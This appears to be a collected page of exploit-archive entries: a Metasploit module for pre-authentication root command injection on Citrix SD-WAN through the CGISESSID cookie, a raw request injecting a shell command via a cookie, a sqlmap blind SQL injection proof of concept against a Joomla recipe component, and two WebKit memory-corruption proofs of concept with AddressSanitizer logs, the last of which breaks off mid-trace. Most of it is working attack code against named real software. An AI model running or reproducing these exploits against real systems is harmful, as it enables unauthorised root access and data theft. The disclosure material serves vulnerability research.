# Description PreAuth Remote Root Citrix SD-WAN <= v9.1.2.26.561201. This exploit leverages a command injection bug. 
#
# xort @ Critical Start

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = ExcellentRanking
	include  Exploit::Remote::Tcp
        include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Citrix SD-WAN CGISESSID Cookie Remote Root',
					'Description'    => %q{
					This module exploits a remote command execution vulnerability in the Citrix SD-WAN Appliace Version <=  v9.1.2.26.561201. The vulnerability exist in a section of the machine's session checking functionality. If the CGISESSID cookie holds shell-command data - it is used in a call to system where input is processed unsanitized.
			},
			'Author'         =>
				[
					'xort@Critical Start', # vuln + metasploit module
				],
			'Version'        => '$Revision: 1 $',
			'References'     =>
				[
					[ 'none', 'none'],
				],
			'Platform'      => [ 'linux'],
			'Privileged'     => true,
			 'Arch'          => [ ARCH_X86 ],
                        'SessionTypes'  => [ 'shell' ],
		        'Payload'        =>
                                { 
                                  'Compat' =>
                                  {
                                        'ConnectionType' => 'find',
                                  }
                                },

			'Targets'        =>
				[
					['Linux Universal',
						{
								'Arch' => ARCH_X86,
								'Platform' => 'linux'
						}
					],
				],
			'DefaultTarget' => 0))

			register_options(
				[
					OptString.new('CMD', [ false, 'Command to execute', "" ]),	
					Opt::RPORT(443),
				], self.class)
	end

	def run_command(cmd)

		vprint_status( "Running Command...\n" )

		# send request with payload	
		res = send_request_cgi({
			'method' => 'POST',
                        'uri'     => "/global_data/",
			'vars_post' => {
				'action' => 'logout'
			},
 	                'headers' => {
                        	'Connection' => 'close',
                        	'Cookie' => 'CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`'+cmd+'`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7;',
                        }

		})


		# pause to let things run smoothly
		sleep(2)


	end

	
	def exploit
		# timeout
		timeout = 1550;

		# pause to let things run smoothly
		sleep(2)

		 #if no 'CMD' string - add code for root shell
                if not datastore['CMD'].nil? and not datastore['CMD'].empty?

                        cmd = datastore['CMD']

                        # Encode cmd payload

                        encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')

			# upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload)
                        run_command("echo -e #{encoded_cmd}>/tmp/n")
                        run_command("chmod 755 /tmp/n")
                        run_command("sudo /tmp/n")
                else
                        # Encode payload to ELF file for deployment
                        elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
                        encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')

			# upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
                        run_command("echo -e #{encoded_elf}>/tmp/m")
                        run_command("chmod 755 /tmp/m")
                        run_command("sudo /tmp/m")

			# wait for magic
                        handler
			
                end


	end
end
HireHackking 
POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1
Host: 10.242.129.149
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/
Cookie: CAKEPHP=`sleep 10`
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

action=logout
HireHackking 
# Exploit Title: Joomla JoomRecipe 1.0.4 Component - Blind SQL Injection Vulnerability
# Date: 20.07.2017
# Exploit Author: Teng
# Vendor Homepage: http://joomboost.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/joomrecipe/
# Version: 1.0.4
# Platform: PHP

1. Description
Blind SQL Injection on Search page, with "search_author" parameter (POST)

2. Proof of concept
sqlmap.py -u "http://localhost/[PATH]/search/results.html" -p search_author --data "searchPerformed=1&task=search&searchword=asd&searchCategories%5B%5D=*&search_cuisine=&searchSeasons=&search_author=1&search_max_prep_hours=2&search_max_prep_minutes=0&search_max_cook_hours=2&search_max_cook_minutes=0&search_min_rate=0&search_max_cost=999&currentIngredient=" --random-agent --dbs

Parameter: search_author (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: searchPerformed=1&task=search&searchword=asd&searchCategories[]=*&search_cuisine=&searchSeasons=&search_author=(SELECT (CASE WHEN (8160=8160) THEN 8160 ELSE 8160*(SELECT 8160 FROM INFORMATION_SCHEMA.PLUGINS) END))&search_max_prep_hours=2&search_max_prep_minutes=0&search_max_cook_hours=2&search_max_cook_minutes=0&search_min_rate=0&search_max_cost=999&currentIngredient=
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1250

There is a heap buffer overflow in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.

PoC:

=================================================================
-->

<script>
function go() {
  i.value = "1";
  i.type = "search";
  f.submit();
}
</script>
<body onload=go()>
<form id="f">
<input id="i" results="1">

<!--
=================================================================

ASan log:

=================================================================
==805==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200006a660 at pc 0x000116496d47 bp 0x7fff5597b2a0 sp 0x7fff5597b298
READ of size 8 at 0x61200006a660 thread T0
==805==WARNING: invalid path to external symbolizer!
==805==WARNING: Failed to use and restart external symbolizer!
    #0 0x116496d46 in WTF::VectorBufferBase<WebCore::RecentSearch>::buffer() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2694d46)
    #1 0x116496bed in WTF::Vector<WebCore::RecentSearch, 0ul, WTF::CrashOnOverflow, 16ul>::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2694bed)
    #2 0x116493b4b in unsigned int WTF::Vector<WebCore::RecentSearch, 0ul, WTF::CrashOnOverflow, 16ul>::removeAllMatching<WebCore::RenderSearchField::addSearchResult()::$_0>(WebCore::RenderSearchField::addSearchResult()::$_0 const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2691b4b)
    #3 0x116493860 in WebCore::RenderSearchField::addSearchResult() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2691860)
    #4 0x114905297 in WebCore::FormSubmission::create(WebCore::HTMLFormElement&, WebCore::FormSubmission::Attributes const&, WebCore::Event*, WebCore::LockHistory, WebCore::FormSubmissionTrigger) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb03297)
    #5 0x114b3aaab in WebCore::HTMLFormElement::submit(WebCore::Event*, bool, bool, WebCore::FormSubmissionTrigger) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd38aab)
    #6 0x1154cd5a0 in WebCore::jsHTMLFormElementPrototypeFunctionSubmitCaller(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16cb5a0)
    #7 0x1154c99a8 in long long WebCore::BindingCaller<WebCore::JSHTMLFormElement>::callOperation<&(WebCore::jsHTMLFormElementPrototypeFunctionSubmitCaller(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16c79a8)
    #8 0x58d153801027  (<unknown module>)
    #9 0x11fd2434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
    #10 0x11fd2434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
    #11 0x11fd1d91a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)
    #12 0x11f982757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)
    #13 0x11f9043da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)
    #14 0x11ef3c0f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)
    #15 0x11ef3c362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)
    #16 0x11ef3c6d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)
    #17 0x114ff5a15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)
    #18 0x115389510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)
    #19 0x11478a68e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e)
    #20 0x11478a170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170)
    #21 0x114665041 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x863041)
    #22 0x114674aaf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x872aaf)
    #23 0x1145767af in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7747af)
    #24 0x114571103 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f103)
    #25 0x1149169ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)
    #26 0x114913d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)
    #27 0x11458f493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)
    #28 0x114b035c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)
    #29 0x11462e093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)
    #30 0x1145ed386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
    #31 0x11407c997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
    #32 0x1140762aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
    #33 0x1169fdc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
    #34 0x10ad232eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
    #35 0x10ad26689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
    #36 0x10ad25ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
    #37 0x10a5c6683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
    #38 0x10a3703b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
    #39 0x10a379888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)
    #40 0x1203b0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)
    #41 0x1203b0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)
    #42 0x7fff8da4f3c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)
    #43 0x7fff8da302cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)
    #44 0x7fff8da2f7c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)
    #45 0x7fff8da2f1c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)
    #46 0x7fff8cf90ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
    #47 0x7fff8cf90cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
    #48 0x7fff8cf90b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
    #49 0x7fff8b52be23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)
    #50 0x7fff8bca785d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)
    #51 0x7fff8b5207aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)
    #52 0x7fff8b4eb1dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)
    #53 0x7fffa33eb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
    #54 0x7fffa33ea2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
    #55 0x10a28156c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
    #56 0x7fffa3192234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)

0x61200006a660 is located 24 bytes to the right of 264-byte region [0x61200006a540,0x61200006a648)
allocated by thread T0 here:
    #0 0x10d26dd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
    #1 0x7fffa3314281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
    #2 0x120401ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)
    #3 0x1203f6c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)
    #4 0x12038c437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)
    #5 0x12038b768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)
    #6 0x11400c548 in WebCore::RenderObject::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a548)
    #7 0x116bd7dbd in WebCore::RenderPtr<WebCore::RenderTextControlSingleLine> WebCore::createRenderer<WebCore::RenderTextControlSingleLine, WebCore::HTMLInputElement&, WebCore::RenderStyle>(WebCore::HTMLInputElement&&&, WebCore::RenderStyle&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd5dbd)
    #8 0x116bd7d30 in WebCore::TextFieldInputType::createInputRenderer(WebCore::RenderStyle&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd5d30)
    #9 0x114b57c46 in WebCore::HTMLInputElement::createElementRenderer(WebCore::RenderStyle&&, WebCore::RenderTreePosition const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd55c46)
    #10 0x1165cd605 in WebCore::RenderTreeUpdater::createRenderer(WebCore::Element&, WebCore::RenderStyle&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cb605)
    #11 0x1165cc2f7 in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca2f7)
    #12 0x1165cbc4d in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9c4d)
    #13 0x1165cb47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)
    #14 0x1145707e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)
    #15 0x11458f478 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d478)
    #16 0x114b035c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)
    #17 0x11462e093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)
    #18 0x1145ed386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
    #19 0x11407c997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
    #20 0x1140762aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
    #21 0x1169fdc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
    #22 0x10ad232eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
    #23 0x10ad26689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
    #24 0x10ad25ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
    #25 0x10a5c6683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
    #26 0x10a3703b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
    #27 0x10a379888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)
    #28 0x1203b0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)
    #29 0x1203b0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2694d46) in WTF::VectorBufferBase<WebCore::RecentSearch>::buffer()
Shadow bytes around the buggy address:
  0x1c240000d470: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x1c240000d480: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c240000d490: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x1c240000d4a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x1c240000d4b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1c240000d4c0: 00 00 00 00 00 00 00 00 00 fa fa fa[fa]fa fa fa
  0x1c240000d4d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x1c240000d4e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c240000d4f0: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
  0x1c240000d500: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x1c240000d510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==805==ABORTING
-->
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1244

There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.

PoC:

=================================================================
-->

<script>
var runcount = 0;
function go() {
  runcount++; if(runcount > 2) { return; }
  i.type = "foo";
  i.select();
  i.type = "search";
  document.onsearch = document.body.onload;
  document.execCommand("insertHTML", false, "");
}
</script>
<body onload=go()>
<input id="i" type="checkbox" incremental="incremental">

<!--
=================================================================

ASan log:

=================================================================
==29786==ERROR: AddressSanitizer: heap-use-after-free on address 0x6110000e2a88 at pc 0x000113b182db bp 0x7fff5a00de60 sp 0x7fff5a00de58
READ of size 8 at 0x6110000e2a88 thread T0
==29786==WARNING: invalid path to external symbolizer!
==29786==WARNING: Failed to use and restart external symbolizer!
    #0 0x113b182da in WebCore::InputType::element() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a2da)
    #1 0x1166e662e in WebCore::TextFieldInputType::didSetValueByUserEdit() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd862e)
    #2 0x1166e6513 in WebCore::TextFieldInputType::subtreeHasChanged() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd8513)
    #3 0x114661933 in WebCore::HTMLInputElement::subtreeHasChanged() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd53933)
    #4 0x1141e9756 in WebCore::notifyTextFromControls(WebCore::Element*, WebCore::Element*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8db756)
    #5 0x1141e8ea8 in WebCore::Editor::appliedEditing(WTF::PassRefPtr<WebCore::CompositeEditCommand>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8daea8)
    #6 0x113c8bb78 in WebCore::CompositeEditCommand::didApplyCommand() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37db78)
    #7 0x113c8b4eb in WebCore::CompositeEditCommand::apply() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d4eb)
    #8 0x11421327d in WebCore::executeInsertFragment(WebCore::Frame&, WTF::PassRefPtr<WebCore::DocumentFragment>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x90527d)
    #9 0x11420cf05 in WebCore::executeInsertHTML(WebCore::Frame&, WebCore::Event*, WebCore::EditorCommandSource, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8fef05)
    #10 0x114209f93 in WebCore::Editor::Command::execute(WTF::String const&, WebCore::Event*) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8fbf93)
    #11 0x1140964fa in WebCore::Document::execCommand(WTF::String const&, bool, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7884fa)
